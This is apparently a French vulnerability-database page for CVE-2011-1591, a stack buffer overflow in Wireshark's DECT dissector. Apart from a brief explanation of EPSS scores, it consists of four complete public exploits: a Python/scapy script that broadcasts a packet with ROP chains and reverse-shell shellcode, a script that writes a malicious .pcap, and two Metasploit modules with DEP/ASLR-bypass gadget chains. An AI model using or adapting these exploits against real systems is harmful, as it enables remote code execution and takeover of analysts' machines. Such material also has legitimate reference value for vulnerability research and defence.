CVE-2011-1591 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/env python # -*- coding: iso-8859-15 -*- a = """ \n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n # # -------- Team : Consortium-of-Pwners # -------- Author : ipv # -------- Impact : high # -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz # -------- Description # # This code exploits a remote stack based buffer overflow in the DECT dissector of # wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to # shellcode located the payload. # All the process is automated, and bypass any NX/ALSR. # # Operating Systems tested : [see the summary] with scapy >= 2.5 # For any comments, remarks, news, please mail me : ipv _at_ [team] . net ###########################################################################\n""" import sys, struct if sys.version_info >= (2, 5): from scapy.all import * else: from scapy import * # align def _x(v): return struct.pack("<I", v) # Gadget Table - Arch linux v2010.05 default package # - wireshark-cli-1.4.3-1-i686.pkg.tar.xz # - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz arch_rop_chain = [ # Safe SEIP overwrite _x(0x8069acb), # pop ebx ; pop esi ; pop ebp _x(0), _x(0x80e9360), _x(0), # fake (arg1, arg2, arg3), to avoid crash # mprotect 1st arg : stack & 0xffff0000 _x(0x8067d90), # push esp ; pop ebp _x(0x8081f2e), # xchg ebp eax _x(0x80f9d7f), # xchg ecx, eax _x(0x8061804), # pop eax _x(0xffff0000), # _x(0x80c69f0), # xchg edi, eax _x(0x80ff067), # and ecx edi ; dec ecx _x(0x8077c53), # inc ecx ; sub al 0x5d _x(0x8061804), # pop eax _x(0x7f16a5d0), # avoid crash with dec dword [ecx-0x76fbdb8c] _x(0x8048360), # xchg ecx eax _x(0x8089f46), # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c] _x(0x8067d90), # push esp ; pop ebp _x(0x8081f2e), # xchg ebp eax _x(0x8067d92)*7, # ret # 1st arg of mprotect is on esp+48 address (see below) _x(0x80745f9), # mov [eax+0x50] edx ; pop ebp _x(0), # we search address of mprotect (@mprotect = @fopen + 0x6fe70) _x(0x8065226), # pop eax _x(0x81aca20-0xc), # got[fopen] _x(0x8074597), # mov eax [eax+0xc] _x(0x8048360), # xchg ecx eax _x(0x8065226), # pop eax _x(0x6fe70), _x(0x8081f2e), # xchg ebp eax _x(0x806973d), # add ecx ebp _x(0x08104f61), # jmp *%ecx _x(0x0811eb63), # pop ebx, pop esi, pop edi # mprotect args (base_addr, page size, mode) _x(0), # Stack Map that is updated dynamically (see upper) _x(0x10000), # PAGE size 0x1000 _x(0x7), # RWX Mode # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x8061804), # pop eax _x(0xff+0x50), # esp will be decreased of 0xff + 0x50 bytes; _x(0x80b8fc8), # xchg edi eax _x(0x8067d90), # push esp ; pop ebp _x(0x80acc63), # sub ebp, edi ; dec ecx _x(0x8081f2e), # xchg ebp eax _x(0x0806979e) # jmp *eax ] # Gadget Table - Bt4 compiled without SSP/FortifySource # Source wireshark 1.4.3 labs_rop_chain = [ # Safe SEIP overwrite _x(0x08073fa1), # pop ebx ; pop esi ; pop ebp _x(0), _x(0x0808c4d3), _x(0), # fake (arg1, arg2, arg3), to avoid crash # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode # mprotect 3r d arg _x(0x080e64cf), # pop edx ; pop es ; add cl cl _x(0x7), _x(0x0), # RWX mode 0x7 # mprotect 1st arg (logical AND with stack address to get address base), _x(0x080a1711), # mov edi esp ; dec ecx _x(0x0815b74f), # pop ecx _x(0xffff0000), # _x(0x0804c73c), # xchg ecx eax _x(0x080fadd7), # and edi eax ; dec ecx _x(0x0804c73c), # xchg ecx eax _x(0x080af344), # mov ebx edi ; dec ecx # mprotect 2nd arg _x(0x0815b74f), # pop ecx _x(0x10000), # PAGE size 0x10000 # int 0x80 : here vdso is not randomized, so, we use it! _x(0x80d8b71), # pop eax _x(0x7D), # 0x7D = mprotect syscall _x(0x804e6df), # pop *esi _x(0xffffe411), # int 0x80 # _x(0xffffe414), # @sysenter in .vdso _x(0x080ab949), # jmp *esi # now we can jump to our lower addressed shellcode by decreasing esp register _x(0x0815b74f), # pop ecx _x(256), # esp will be decreased of 256bytes _x(0x080a1711), # mov edi esp ; dec ecx _x(0x081087d3), # sub edi ecx ; dec ecx _x(0x080f7cb1) # jmp *edi ] addr_os = { # ID # OS # STACK SIZE # GADGET TABLE 1 : ["Arch Linux 2010.05 ", 0xb9, arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz 2 : ["Labs test ", 0xbf, labs_rop_chain], -1 : ["Debian 5.0.8 Lenny ", -3, False], # wireshark_1.0.2-3+lenny12_i386.deb -2 : ["Debian 6.0.2 Squeeze ", -1, False], # wireshark_1.2.11-6+squeeze1_i386.deb -3 : ["Fedora 14 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -4 : ["OpenSuse 11.3 ", -1, False], # wireshark-1.4.3-1.2.2.i586.rpm -5 : ["Ubuntu 10.10 | 11.04 ", -1, False], # -6 : ["Gentoo * ", -2, False] # } print a def usage(): print "Please select and ID >= 0 :\n" print " ID TARGET INFO" print "--------------------------------------------------------------------" for i in addr_os.iteritems(): print " %2d -- %s "%(i[0], i[1][0]), if i[1][1] == -1: print "Default package uses LibSSP & Fortify Source" elif i[1][1] == -2: print "Compiled/Build with Fortify Source" elif i[1][1] == -3: print "DECT protocol not supported" else: print "VULN -> Stack size %d"%(i[1][1]) sys.exit(1) if len(sys.argv) == 1: usage() elif addr_os.has_key(int(sys.argv[1])) is False: usage() elif int(sys.argv[1]) < 0: usage() target = addr_os[int(sys.argv[1])] print "\n[+] Target : %s"%target[0] rop_chain = "".join([ rop for rop in target[2]]) # msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; SEIP_SMASH = target[1] print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH) nopsled = "\x90" head_nop = 50 shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop) payload = shellcode + rop_chain # stack alignment if (len(payload) % 2): diff = len(payload) % 2 payload = payload[(2-diff):] print "\t[+] Payload length : %d"%len(payload) evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload # evil_packet.show() print "\t[+] Evil packet length : %d"%len(evil_packet) print "\t[+] Sending packet to broadcast" sendp(evil_packet)

#!/usr/bin/env python # Vulnerable app: Wireshark 1.4.1-1.4.4 # Author: sickness # Download : # OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit) # DATE : 17.04.2011 # Fixed in latest version 1.4.5 # DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr ################################################################### # Offset might change! # Watch out for other bad chars!! # Current bad chars: \x00\x0a\x0d\x09 ################################################################### # References: # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836 # https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838 ################################################################### import sys from scapy.all import * #payload=calc.exe #ppr is from a non-ASLR enabled wireshark module evil = Ether(type=0x2323)/("\x41" * 1239 + "\xeb\x06\x90\x90" + "\x5D\x10\x94\x62" + "\x90" * 16 + "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a" + "\x90" * 4500) wrpcap("evil.pcap",evil) print "\n" print "Evil .pcap file created!" print "It's pwnsauce time!\n"

## # $Id: wireshark_packet_dect.rb 12364 2011-04-19 07:53:58Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 When opening a malicious .pcap file in Wireshark, a stack buffer occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7. }, 'License' => MSF_LICENSE, 'Author' => [ 'sickness', #found the vulnerabilitiy 'corelanc0d3r' #rop exploit + msf module ], 'Version' => '$Revision: 12364 $', 'References' => [ [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], [ 'URL', 'http://www.exploit-db.com/exploits/17185' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 936, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)', { 'OffSet' => 1243, 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 18 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']), ], self.class) end def junk return rand_text(4).unpack("L")[0].to_i end def exploit print_status("Creating '#{datastore['FILENAME']}' file ...") global_header = "\xd4\xc3\xb2\xa1" # magic_number global_header << "\x02\x00" # major version global_header << "\x04\x00" # minor version global_header << "\x00\x00\x00\x00" # GMT to local correction global_header << "\x00\x00\x00\x00" # accuracy global_header << "\xff\x7f\x00\x00" # snaplen global_header << "\x01\x00\x00\x00" # data link type packet_header = "\x26\x32\xac\x4d" #timestamp seconds packet_header << "\xda\xfa\x00\x08" #timestamp microseconds packet_header << "\x04\x06\x00\x00" #nr of octets of packet in file packet_header << "\x04\x06\x00\x00" #actual size of packet (1540) ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" print_status("Preparing payload") pivot = [target.ret].pack('V') # pvefindaddr rop 'n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don't count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*") rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN ** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN ** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*") pivot = [target.ret].pack('V') buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) buffer << nops buffer << payload.encoded buffer << pivot filler = 1540 - buffer.length buffer << rand_text(filler) filecontent = global_header filecontent << packet_header filecontent << ptype filecontent << buffer print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes") file_create(filecontent) end end

## # $Id: wireshark_packet_dect.rb 12371 2011-04-19 16:41:58Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Capture def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)', 'Description' => %q{ This module exploits a stack buffer overflow in Wireshark <= 1.4.4 by sending an malicious packet.) }, 'License' => MSF_LICENSE, 'Author' => [ 'Paul Makowski', #Initial discovery 'sickness', #proof of concept 'corelanc0d3r', #rop exploit + msf module ], 'Version' => '$Revision: 12371 $', 'References' => [ [ 'CVE', '2011-1591'], [ 'OSVDB', '71848'], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ], [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ], [ 'URL', 'http://www.exploit-db.com/exploits/17185' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 936, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Win32 Universal (Generic DEP & ASLR Bypass)', { 'OffSet' => 1243, 'Ret' => 0x667c484d, #libgnutl pivot - tx Lincoln } ], ], 'Privileged' => false, 'DisclosureDate' => 'Apr 18 2011', 'DefaultTarget' => 0)) register_options([ OptBool.new('LOOP', [true, 'Send the packet every X seconds until the job is killed', false]), OptInt.new('DELAY', [true, 'This option sets the delay between sent packets', 5]) ], self.class) register_advanced_options([ OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]), ], self.class) deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY') end def junk return rand_text(4).unpack("L")[0].to_i end def exploit ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23" print_status("Preparing payload") pivot = [target.ret].pack('V') # pvefindaddr rop 'n roll # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below rop_pivot = [ 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x64f9d5ec, # ADD ESP,0C # RET - libfontconfig-1.dll 0x618d7d0e, # RET <- don't count on this one ! 0x618d7d0e, # RET 0x618d7d0e, # RET 0x618d7d0e, # RET 0x61C14268, # ADD ESP,24 # RETN - freetype6.dll 0xFFFFFFFF, # crash baby ! 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, 0x618d7d0e, ].pack("V*") rop_gadgets = [ 0x6d7155cb, # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll] junk, 0x6d596e31, # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x61c14552, # POP EBX # RETN ** [freetype6.dll] 0x00000800, # size - 0x800 should be more than enough 0x61c14043, # POP ESI # RETN ** [freetype6.dll] 0x0000009C, 0x6d58321a, # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll] junk, junk, 0x68610a27, # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll] 0x629445a6, # POP EAX # RETN ** [libatk-1.0-0.dll] 0x62d9027c, # 0x6c385913, # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll] 0x617bc526, # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll] 0x64f8c692, # POP EDX # RETN ** [libfontconfig-1.dll] 0x00000040, # 0x619638db, # POP ECX # RETN ** [libgtk-win32-2.0-0.dll] 0x6536B010, # RW 0x618d7d0d, # POP EDI # RETN ** [libgtk-win32-2.0-0.dll] 0x618d7d0e, # RET 0x64fa0c15, # POP EAX # RETN ** [libfontconfig-1.dll] 0x618d7d0e, # RET 0x61963fdb, # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll] ].pack("V*") pivot = [target.ret].pack('V') buffer = rand_text(131) buffer << rop_pivot buffer << rop_gadgets nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length)) buffer << nops buffer << payload.encoded buffer << pivot filler = 1500 - buffer.length buffer << rand_text(filler) pkt = ptype pkt << buffer print_status("Sending malicious packet") open_pcap() handler if datastore['LOOP'] while true break if session_created? and datastore['ExitOnSession'] inject(pkt) select(nil,nil,nil,datastore['DELAY']) end else inject(pkt) end close_pcap end end